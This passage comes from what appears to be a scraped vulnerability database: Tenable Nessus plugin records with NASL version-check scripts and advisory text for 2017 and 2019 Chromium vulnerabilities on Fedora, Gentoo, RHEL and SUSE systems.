Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"chromium-native_client-59.0.3071.86-1.20170607gitaac1de2.fc26\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:chromium-native_client\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:27:33", "description": "The remote host is affected by the vulnerability described in GLSA-201706-20 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, bypass security restrictions or spoof content.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-21T00:00:00", "type": "nessus", "title": "GLSA-201706-20 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5068", "CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5084", "CVE-2017-5085", "CVE-2017-5086", "CVE-2017-5087", "CVE-2017-5088", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201706-20.NASL", "href": "https://www.tenable.com/plugins/nessus/100946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201706-20.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100946);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5068\",\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5084\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\",\n \"CVE-2017-5087\",\n \"CVE-2017-5088\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"GLSA\", value:\"201706-20\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"GLSA-201706-20 : Chromium: Multiple vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201706-20\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, bypass security restrictions or spoof content.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201706-20\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-59.0.3071.104'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 59.0.3071.104\"), vulnerable:make_list(\"lt 59.0.3071.104\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:50", "description": "The version of Google Chrome installed on the remote host is prior to 72.0.3626.81. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2019/01/29. Please refer to the release notes for additional information. Note that Nessus Network Monitor has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-03-26T00:00:00", "type": "nessus", "title": "Google Chrome < 72.0.3626.81 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782"], "modified": "2019-03-26T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "700482.PASL", "href": "https://www.tenable.com/plugins/nnm/700482", "sourceData": "Binary data 700482.pasl", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:41:23", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.81.\n\nSecurity Fix(es) :\n\n* chromium-browser: Inappropriate implementation in QUIC Networking (CVE-2019-5754)\n\n* chromium-browser: Inappropriate implementation in V8 (CVE-2019-5755)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5756)\n\n* chromium-browser: Type Confusion in SVG (CVE-2019-5757)\n\n* chromium-browser: Use after free in Blink (CVE-2019-5758)\n\n* chromium-browser: Use after free in HTML select elements (CVE-2019-5759)\n\n* chromium-browser: Use after free in WebRTC (CVE-2019-5760)\n\n* chromium-browser: Use after free in SwiftShader (CVE-2019-5761)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5762)\n\n* chromium-browser: Insufficient validation of untrusted input in V8 (CVE-2019-5763)\n\n* chromium-browser: Use after free in WebRTC (CVE-2019-5764)\n\n* chromium-browser: Insufficient policy enforcement in the browser (CVE-2019-5765)\n\n* chromium-browser: Inappropriate implementation in V8 (CVE-2019-5782)\n\n* chromium-browser: Insufficient policy enforcement in Canvas (CVE-2019-5766)\n\n* chromium-browser: Incorrect security UI in WebAPKs (CVE-2019-5767)\n\n* chromium-browser: Insufficient policy enforcement in DevTools (CVE-2019-5768)\n\n* chromium-browser: Insufficient validation of untrusted input in Blink (CVE-2019-5769)\n\n* chromium-browser: Heap buffer overflow in WebGL (CVE-2019-5770)\n\n* chromium-browser: Heap buffer overflow in SwiftShader (CVE-2019-5771)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5772)\n\n* chromium-browser: Insufficient data validation in IndexedDB (CVE-2019-5773)\n\n* chromium-browser: Insufficient validation of untrusted input in SafeBrowsing (CVE-2019-5774)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox (CVE-2019-5775)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox (CVE-2019-5776)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox (CVE-2019-5777)\n\n* chromium-browser: Insufficient policy enforcement in Extensions (CVE-2019-5778)\n\n* chromium-browser: Insufficient policy enforcement in ServiceWorker (CVE-2019-5779)\n\n* chromium-browser: Insufficient policy enforcement (CVE-2019-5780)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox (CVE-2019-5781)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-02-12T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2019:0309)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782"], "modified": "2022-05-23T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-0309.NASL", "href": "https://www.tenable.com/plugins/nessus/122112", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0309. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122112);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/23\");\n\n script_cve_id(\n \"CVE-2019-5754\",\n \"CVE-2019-5755\",\n \"CVE-2019-5756\",\n \"CVE-2019-5757\",\n \"CVE-2019-5758\",\n \"CVE-2019-5759\",\n \"CVE-2019-5760\",\n \"CVE-2019-5761\",\n \"CVE-2019-5762\",\n \"CVE-2019-5763\",\n \"CVE-2019-5764\",\n \"CVE-2019-5765\",\n \"CVE-2019-5766\",\n \"CVE-2019-5767\",\n \"CVE-2019-5768\",\n \"CVE-2019-5769\",\n \"CVE-2019-5770\",\n \"CVE-2019-5771\",\n \"CVE-2019-5772\",\n \"CVE-2019-5773\",\n \"CVE-2019-5774\",\n \"CVE-2019-5775\",\n \"CVE-2019-5776\",\n \"CVE-2019-5777\",\n \"CVE-2019-5778\",\n \"CVE-2019-5779\",\n \"CVE-2019-5780\",\n \"CVE-2019-5781\",\n \"CVE-2019-5782\"\n );\n script_xref(name:\"RHSA\", value:\"2019:0309\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:0309)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.81.\n\nSecurity Fix(es) :\n\n* chromium-browser: Inappropriate implementation in QUIC Networking\n(CVE-2019-5754)\n\n* chromium-browser: Inappropriate implementation in V8 (CVE-2019-5755)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5756)\n\n* chromium-browser: Type Confusion in SVG (CVE-2019-5757)\n\n* chromium-browser: Use after free in Blink (CVE-2019-5758)\n\n* chromium-browser: Use after free in HTML select elements\n(CVE-2019-5759)\n\n* chromium-browser: Use after free in WebRTC (CVE-2019-5760)\n\n* chromium-browser: Use after free in SwiftShader (CVE-2019-5761)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5762)\n\n* chromium-browser: Insufficient validation of untrusted input in V8\n(CVE-2019-5763)\n\n* chromium-browser: Use after free in WebRTC (CVE-2019-5764)\n\n* chromium-browser: Insufficient policy enforcement in the browser\n(CVE-2019-5765)\n\n* chromium-browser: Inappropriate implementation in V8 (CVE-2019-5782)\n\n* chromium-browser: Insufficient policy enforcement in Canvas\n(CVE-2019-5766)\n\n* chromium-browser: Incorrect security UI in WebAPKs (CVE-2019-5767)\n\n* chromium-browser: Insufficient policy enforcement in DevTools\n(CVE-2019-5768)\n\n* chromium-browser: Insufficient validation of untrusted input in\nBlink (CVE-2019-5769)\n\n* chromium-browser: Heap buffer overflow in WebGL (CVE-2019-5770)\n\n* chromium-browser: Heap buffer overflow in SwiftShader\n(CVE-2019-5771)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5772)\n\n* chromium-browser: Insufficient data validation in IndexedDB\n(CVE-2019-5773)\n\n* chromium-browser: Insufficient validation of untrusted input in\nSafeBrowsing (CVE-2019-5774)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox\n(CVE-2019-5775)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox\n(CVE-2019-5776)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox\n(CVE-2019-5777)\n\n* chromium-browser: Insufficient policy enforcement in Extensions\n(CVE-2019-5778)\n\n* chromium-browser: Insufficient policy enforcement in ServiceWorker\n(CVE-2019-5779)\n\n* chromium-browser: Insufficient policy enforcement (CVE-2019-5780)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox\n(CVE-2019-5781)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:0309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5754\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5755\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5756\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5757\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5759\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5760\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5762\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5763\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5764\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5766\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5768\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5770\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5771\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5772\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5774\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5775\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5777\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5778\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5780\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-5782\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5782\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-5759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0309\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-72.0.3626.81-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-72.0.3626.81-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-72.0.3626.81-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-72.0.3626.81-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T14:46:42", "description": "This update for Chromium to version 72.0.3626.96 fixes the following issues :\n\nSecurity issues fixed (bsc#1123641 and bsc#1124936) :\n\n - CVE-2019-5784: Inappropriate implementation in V8 \n\n - CVE-2019-5754: Inappropriate implementation in QUIC Networking.\n\n - CVE-2019-5782: Inappropriate implementation in V8.\n\n - CVE-2019-5755: Inappropriate implementation in V8.\n\n - CVE-2019-5756: Use after free in PDFium.\n\n - CVE-2019-5757: Type Confusion in SVG.\n\n - CVE-2019-5758: Use after free in Blink.\n\n - CVE-2019-5759: Use after free in HTML select elements.\n\n - CVE-2019-5760: Use after free in WebRTC.\n\n - CVE-2019-5761: Use after free in SwiftShader.\n\n - CVE-2019-5762: Use after free in PDFium.\n\n - CVE-2019-5763: Insufficient validation of untrusted input in V8.\n\n - CVE-2019-5764: Use after free in WebRTC.\n\n - CVE-2019-5765: Insufficient policy enforcement in the browser.\n\n - CVE-2019-5766: Insufficient policy enforcement in Canvas.\n\n - CVE-2019-5767: Incorrect security UI in WebAPKs.\n\n - CVE-2019-5768: Insufficient policy enforcement in DevTools.\n\n - CVE-2019-5769: Insufficient validation of untrusted input in Blink.\n\n - CVE-2019-5770: Heap buffer overflow in WebGL.\n\n - CVE-2019-5771: Heap buffer overflow in SwiftShader.\n\n - CVE-2019-5772: Use after free in PDFium.\n\n - CVE-2019-5773: Insufficient data validation in IndexedDB.\n\n - CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing.\n\n - CVE-2019-5775: Insufficient policy enforcement in Omnibox.\n\n - CVE-2019-5776: Insufficient policy enforcement in Omnibox.\n\n - CVE-2019-5777: Insufficient policy enforcement in Omnibox.\n\n - CVE-2019-5778: Insufficient policy enforcement in Extensions.\n\n - CVE-2019-5779: Insufficient policy enforcement in ServiceWorker.\n\n - 